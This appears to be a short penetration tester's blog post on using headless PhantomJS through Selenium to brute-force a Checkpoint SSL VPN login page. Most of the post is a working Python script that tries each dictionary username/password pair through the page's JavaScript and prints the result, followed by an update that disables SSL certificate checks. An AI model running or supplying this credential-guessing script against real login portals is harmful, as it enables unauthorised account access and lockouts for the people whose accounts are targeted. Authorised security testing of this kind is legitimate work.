But sometimes, you run across a web app that does some ungodly JavaScript hashing/mangling/demonic incantations to your input. In these situations, you need a tool that can parse, understand, and even execute the JavaScript from your page.
I have found PhantomJS to be a fantastic tool to help with that. I use it as my "browser" for Selenium scripts and it works the same way, but it is all headless: no need for Firefox or Chrome windows to pop up and start clicking things. It all happens in the background transparently.
I recently came across a Checkpoint SSL VPN that I wanted to try a dictionary attack against. I wrote the following temporary script to accomplish it. It's not speedy, but then again that introduces a pseudo-sleep timer I was going to put in anyway.
I pasted the login combinations in the logins dict and ran it.
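#!/usr/bin/env python3
# Written against an older Selenium: webdriver.PhantomJS and the
# find_element_by_* helpers are no longer available in current Selenium 4 releases.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys

# Username/password combinations to try
logins = {'user1': 'pass1', 'user2': 'pass2'}

for username, password in logins.items():
    # Fresh headless browser for each attempt
    driver = webdriver.PhantomJS()
    driver.set_window_size(1024, 768)
    driver.get('https://CHECKPOINTSSLVPN/sslvpn/Login/Login')
    # Fill in the form so the page's own JavaScript processes the input
    usernamefield = driver.find_element_by_name('userName')
    usernamefield.send_keys(username)
    passwordfield = driver.find_element_by_name('loginInput')
    passwordfield.send_keys(password)
    passwordfield.send_keys(Keys.RETURN)
    # The login page reports the outcome in the ErrorMsg element
    errormsg = driver.find_element_by_id('ErrorMsg').text
    print(username + ':' + password + ' = ' + errormsg)
    # quit() also ends the PhantomJS process; close() only closes the window
    driver.quit()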
UPDATE:
It turns out that PhantomJS will return a completely empty page, without any sort of error, if it encounters an invalid SSL certificate. You can easily account for this by telling PhantomJS to ignore SSL errors, changing:
driver = webdriver.PhantomJS()
to:
driver = webdriver.PhantomJS(service_args=['--ignore-ssl-errors=true'])